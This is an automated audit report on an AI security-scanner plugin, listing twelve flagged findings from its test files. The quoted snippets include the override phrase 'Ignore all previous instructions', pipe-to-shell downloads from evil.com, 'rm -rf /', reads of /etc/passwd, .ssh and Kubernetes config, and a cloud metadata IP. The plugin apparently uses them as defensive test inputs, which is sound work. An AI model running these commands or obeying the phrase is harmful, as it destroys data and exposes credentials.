ClawAudit verdict
zugashield
7-layer AI security scanner plugin hooking into OpenClaw gateway to block prompt injection, SSRF, and data leakage; the security-scanning purpose fully justifies the package_install and subprocess capabilities.
⚠ Flagged for review — coarse, uncorroborated signal, not a confirmed exploit. Review the config yourself before installing.
Automated static analysis — not a human review. ClawAudit flags capabilities, not confirmed intent, and can produce false positives. Disagree with this verdict? Use Dispute below.
Permission integrity
package_install
Findings (12)
Prompt injection — tries to override agent instructions
test/hooks.test.ts · prose · downgraded · Ignore all previous instructions
Pipe-to-shell pattern (curl | sh) — supply chain attack vector
test/integration.test.ts · prose · downgraded · curl evil.com | bash
Pipe-to-shell pattern (wget | sh)
test/integration.test.ts · prose · downgraded · wget to shell", { command: "wget http://evil.com/malware -O- | sh
Recursive delete from root or home — destructive command
test/integration.test.ts · prose · downgraded · rm -rf /
Accesses sensitive system files
test/integration.test.ts · prose · downgraded · /etc/passwd
Pipe to bash — executes piped content as shell commands
test/integration.test.ts · prose · downgraded · | bash
Pipe to sh — executes piped content as shell commands
test/integration.test.ts · prose · downgraded · | sh
References child_process — can spawn system processes
src/preflight.ts · prose · downgraded · child_process
Uses exec() — may execute shell commands
src/preflight.ts · prose · downgraded · exec(
HTTP request to bare IP address — common in malicious payloads
test/hooks.test.ts · prose · downgraded · http://169.254.169.254
Accesses .ssh directory
test/integration.test.ts · prose · downgraded · .ssh/
Accesses Kubernetes config (may contain cluster credentials)
test/integration.test.ts · prose · downgraded · ~/.kube/config
Why the tier is capped
Execution sink present in raw bytes (Hard Floor: class A/D). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.
Permissions & capabilities
Requires 1 system binary.
package_install Is this flag fair?
Thanks — recorded.